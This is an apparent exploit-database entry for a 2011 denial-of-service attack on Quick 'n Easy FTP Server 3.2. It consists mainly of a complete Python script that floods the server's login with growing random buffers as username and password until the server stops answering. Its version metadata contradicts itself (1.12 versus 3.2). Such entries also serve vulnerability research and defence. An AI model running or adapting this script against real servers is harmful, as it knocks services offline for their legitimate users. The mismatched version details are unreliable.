header-logo
Suggest Exploit
vendor:
Quick 'n Easy FTP Server
by:
clshack
7.5
CVSS
HIGH
DOS
400
CWE
Product Name: Quick 'n Easy FTP Server
Affected Version From: 1.12
Affected Version To: 1.12
Patch Exists: NO
Related CWE:
CPE: cpe:2.3:a:pablosoftwaresolutions:quick_'n_easy_ftp_server:3.2:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2011

DOS LOGIN Quick ‘n Easy FTP Server 3.2

This exploit allows an attacker to perform a Denial of Service (DOS) attack by sending a large buffer of random characters as the username and password to the Quick 'n Easy FTP Server 3.2. This causes the server to become unresponsive and deny service to legitimate users.

Mitigation:

Update to a patched version of the Quick 'n Easy FTP Server software that fixes the DOS vulnerability.
Source

Exploit-DB raw data:

# Exploit Title:[DOS LOGIN]  Quick 'n Easy FTP Server 3.2
# Date:28/2/2011
# Author: clshack
# Software Link:
http://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html<http://downstairs.dnsalias.net/homeftpserver.html>
# Version:1.12
# Tested on: windows xp sp3 en
# CVE :

#!/usr/bin/python
from ftplib import *
import random
import socket
def ping(host,port):
    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
        connect=s.connect((host,port));
    except Exception ,e :
        print e
        return 0;
    s.close();
    return 1;

host = "192.168.1.155"
port = 21
buffer="";
while(len(buffer)<200000):
    buffer+=chr(int(random.uniform(0,255)))*2+"?";
    try:
        ftp=FTP();
        ftp.connect(host,port);
        ftp.sendcmd("USER "+buffer)
        ftp.sendcmd("PASS "+buffer)
        ftp.quit();
        ftp.close();
        sleep(int(random.uniform(0,2)))
    except Exception, e:
        print e
    if not ping(host,port):
        print "Dos in Login credentials \n"
        exit(-1)

Twitter:clshackblog